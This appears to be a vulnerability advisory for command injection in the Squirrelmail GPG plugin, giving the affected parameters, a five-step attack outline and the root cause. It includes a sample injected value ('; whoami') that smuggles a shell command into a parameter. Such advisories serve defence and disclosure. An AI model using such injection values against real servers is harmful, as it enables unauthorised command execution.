The G/PGP (GPG) Plugin 2.1 and earlier for Squirrelmail allow remote authenticated users to execute arbitrary commands via shell metacharacters in (1) the fpr parameter to the deleteKey function in gpg_keyring.php, as called by (a) import_key_file.php, (b) import_key_text.php, and (c) keyring_main.php; and (2) the keyserver parameter to the gpg_recv_key function in gpg_key_functions.php, as called by gpg_options.php. NOTE: this issue may overlap CVE-2007-3636.
Squirrelmail's GPG plugin is vulnerable to remote command execution, allowing attackers to execute arbitrary commands on the server. This vulnerability, stemming from insufficient input validation, enables attackers to inject malicious code through crafted parameters, potentially leading to complete system compromise.
Step 1: Target Identification: An attacker identifies a Squirrelmail instance with the vulnerable GPG plugin installed and enabled.
Step 2: Payload Crafting: The attacker crafts a malicious payload containing shell metacharacters (e.g., ; whoami) designed to execute arbitrary commands.
Step 3: Parameter Injection: The attacker injects the crafted payload into the vulnerable parameters (fpr or keyserver) through a specially crafted HTTP request. For example, the attacker might target deleteKey with a malicious fpr value.
Step 4: Command Execution: The Squirrelmail plugin, due to the lack of input validation, passes the attacker-controlled input directly to the gpg command-line utility. The shell interprets the metacharacters, executing the attacker's commands.
Step 5: Result Retrieval (Optional): The attacker may attempt to retrieve the output of their executed commands (e.g., through a file write or network connection), depending on the specific payload and the server's configuration.
The vulnerability arises from a lack of proper input sanitization within the GPG plugin for Squirrelmail. Specifically, the plugin fails to adequately validate user-supplied input before passing it to the gpg command-line utility. This allows attackers to inject shell metacharacters (e.g., ;, |, &) into parameters such as fpr (fingerprint) and keyserver. When these parameters are used in functions like deleteKey and gpg_recv_key, the injected metacharacters are interpreted by the shell, leading to arbitrary command execution. The root cause is the direct use of user-controlled input in shell commands without proper escaping or filtering, creating a command injection vulnerability.